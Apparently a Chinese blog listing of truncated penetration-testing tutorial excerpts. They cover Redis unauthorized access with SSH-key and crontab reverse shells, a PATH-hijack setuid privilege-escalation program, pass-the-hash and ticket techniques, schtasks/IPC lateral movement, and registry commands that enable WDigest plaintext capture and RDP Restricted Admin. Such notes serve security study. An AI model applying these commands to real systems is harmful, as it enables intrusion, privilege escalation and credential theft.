Redis
Redis服务因配置不当,可被攻击者恶意利用。黑客借助Redis内置命令,可将现有数据恶意清空;如果redis以root身份运行,黑客可往服务器上写入SSH公钥文件,直接登录服务器。
搭建环境,我这里就不用公网服务器了吧,我在内网进行搭建
12https://zhuanlan.zhihu.com/p/34527270 //安装redis修改配置文件,使得可以远程访问(bind 127.0.0.1前面加上#号 protected-mode设为no)---vim /etc/redis.conf
默认的配置是使用6379端口,没有密码。这时候会导致未授权访问然后使用redis权限写文件。
在kali上进行端口扫描(工具不限),但是我第一次扫描的时候没有扫出来,第二次就扫出来了,可能是因为我第二次关闭了防火墙的原因?
然后是在kali上下载工具redis-cli:https://codeantenna.com/a/tq9H3WBpEU
利用计划任务执行命令反弹shell在redis以root权限运行时可以写crontab来执行命令反弹shell
先在自己的服务器上监 ...
linux提权自动化脚本利用-4个脚本12345678910111213141516171819信息收集:LinEnumhttps://github.com/rebootuser/LinEnumhttps://blog.1997sty.com/cos/uploads/20220511/18da4eb277be073ce41ea2ad9dd8dde0.zip ---> LinEnum-master.ziplinuxprivcheckerhttps://github.com/sleventyeleven/linuxprivcheckerhttps://blog.1997sty.com/cos/uploads/20220511/e77ae6dc869fe7f05fc67e05e5dda314.zip ---> linuxprivchecker-master.zip两个漏洞探针linux-exploit-suggesterhttps://github.com/mzet-/linux-exploit-suggesterhttps://blog.1997sty.com/c ...
RottenPotato(烂土豆)提权的原理可以简述如下
欺骗NT AUTHORITY\SYSTEM账户通过NTLM认证到我们控制的TCP终端。
对这个认证过程使用中间人攻击(NTLM重放),为NT AUTHORITY\SYSTEM账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的。
模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。
所以,一般从web拿到的webshell都是IIS服务器权限,是具有这个模仿权限的。测试过程中,我发现使用已经建好的账户(就是上面说的用户级账户)去反弹meterpreter然后再去执行EXP的时候会失败,但使用菜刀(IIS服务器权限)反弹meterpreter就会成功。即非服务类用户权限无法窃取成功。
123451、所以我们控制HTTP流量大概都流经我们控制的HTTP服务器,做中介人攻击。2、可以诱导系统高权用户执行一些操作,例如将它们重定向到需要NTLM身份验证的地方。所有NTLM凭据都将中继到本地 ...
linux提权本地环境变量安全1234567#include<unistd.h>void main(){ setuid(0); setgid(0); system("ps");}
什么是shell,就是类似于上一篇的交互式窗口,那么环境变量又是什么?比如说你在linux中输入ls,那么就是显示当前路径下的文件,那么这个ls是怎么做到的?ls也是通过代码写出来的,放在一个指定的路径下,那么这个目录下的特定文件在和一个特定命令进行绑定,打个比方/bin/xxx/ls ,当我在执行ls的时候,就执行/bin/xxx/ls这个文件中的代码,从而实现查看当前目录下文件的作用
执行命令
12345678cd /tmpgcc demo.c -o shellcp /bin/sh /tmp/psexport PATH=/tmp:$PATH./pschmod u+s shell./shellid
执行命令
12345678cd /tmpgcc demo.c -o ...
基本理论
DMZ
英文全名“Demilitarized Zone”,中文含义是“隔离区”,在安全领域的具体含义是“内外网防火墙之间的区域”。DMZ区是一个缓冲区,在DMZ区存放着一些公共服务器,比如论坛等
工作组 VS 域环境
工作组:地位平等,管理分散,没有集中管理。
域环境:地位不平等,管理集中,实现集中管理。
域环境也可以简单的理解为工作组的升级版,更好管理。
这里我们把域环境和工作组区分开来是因为他们的攻击手段不同,工作组中的攻击手法如DNS劫持、ARP欺骗在域环境下是没有作用的。有一些攻击手段需要一些条件,这些条件在域环境下没有,相应的攻击手段就会失效。
域控制器DC
域控DC是这个域中的管理者,域里面的最高权限,判断是否拿下整个域,就是看你是否拿下这台域控制器
AD(活动目录)
是微软所提供的目录服务(查询,身份验证),活动目录的核心包含了活动目录数据库,在活动目录数据库中包含了域中所有的对象(用户,计算机,组…),活动目录(Active Directory)是面向Windows Standard Server、Windows Ente ...
PTH (pass the hash) 利用lm或者ntlm的值进行的渗透测试
PTT (pass the ticket) 利用的票据凭证TGT进行的渗透测试
PTK (pass the key) 利用的ekeys aes256进行的渗透测试
PTH在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash远程访问主机或者服务,而不提供明文密码。
如果禁用了ntlm认证,PsExec工具无法利用获得的ntlm hash进行远程连接,但是使用mimikatz工具还是可以攻击成功。
对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012等,可以使用AES keys代替NT hash来实现ptk攻击。
KB2871997补丁后的影响
12345pth:没打补丁用户都可以连接,打了补丁只能administrator连接ptk:打了补丁才能用户都可以连接,采用aes256连接按照思维导图,ptk攻击其实简单一点说就是微软为了防范pth攻击进行的补救,但是又不能完全把连接这 ...
横向渗透明文传递
在拿下一台内网主机,通过本地信息搜集收集用户凭据等信息后,如何横向渗透拿下更多的主机?这里仅介绍at&schtasks命令的使用,在已知目标系统的用户明文密码的基础上,直接可在远程主机上执行命令
获取到某域主机权限-> minikatz得到密码(明文,hash)->用到信息收集里面域用户的列表当做用户名字典->用到密码明文当做字典->尝试连接->创建计划任务(at|schtasks)->执行文件可为后门或者相关命令
IPC( Internet Process Connection)是共享“命名管道”的资管,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相关的权限,在远程管理计算机和查看计算机的共享资源时使用
利用流程
建立IPC链接到目标主机
拷贝要执行的命令脚本到目标主机
查看目标时间,创建计划任务(at,schtasks)定时执行拷贝到的脚本
删除IPC链接
12345678net use \\server\ipc$"password" /user:usernam ...
Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码
Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码
针对以上情况,我们提供了4种方式解决此类问题
利用哈希hash传递(pth,ptk等)进行移动
利用其它服务协议(SMB,WMI等)进行哈希移动
利用注册表操作开启Wdigest Auth值进行获取
利用工具或第三方平台(Hachcat)进行破解获取
参考博客:https://blog.csdn.net/qq_44881113/article/details/120315448
123#注册表操作开启Wdigest Auth值reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f#重启或用户重新登录后可以成功抓取
Windows系统LM Hash及NTLM Hash加密算法,个人系统在Windows vista后,服务器系统 ...
域横向移动RDP传递-Mimikatz
除了上述讲到的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作。
RDP协议连接:判断对方远程桌面服务是否开启(默认:3389),端口扫描判断
1234567891011121314151617RDP明文密码链接windows: mstscmstsc.exe /console /v:192.168.70.134 /administratorlinux: rdesktop 192.168.3.21:3389 RDP密文HASH链接windows Server需要开启 Restricted Admin mode,在Windows 8.1和Windows Server 2012 R2中默认开启,同时如果Win 7 和Windows Server 2008 R2安装了2871997、2973351补丁也支持; 开启命令:REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t R ...
必要基础知识点
内网ip地址是私有ip地址(10.0.0.0/8, 172.16.0.0/12 , 192.168.0.0/16),除此之外就是外网ip
两个不同的内网的主机想要通过CS或者MSF等工具实现控制或者通讯是不可能的,必须要借助代理
正反向协议通信连接问题
正向:控制端主动去连接被控端
反向:被控端主动去连接控制端
为什么要区分正向和反向?–因为如果控制端是外网主机,被控端是内网主机,就相当于控制端有一个唯一的IP地址(比如103.12.4.11),通过这个IP地址就可以找到控制端,而在内网的被控端(比如192.168.23.36),你通过控制端主动去找是找不到的,因为这个内网IP地址并不是唯一的,可能很多内网都用了这个IP地址,你根本没法找。此时就需要反向连接了,让内网的被控端主动去找外网的控制端。
内网穿透代理隧道技术说明
隧道主要解决流量分析工具、流量监控工具、防火墙等相关工具的过滤问题
代理主要解决网络的连通性问题
内网渗透-横向渗透-穿透-代理相关知识点
代理技术主要解决3种问题:内网有外网,内网有过滤(防 ...
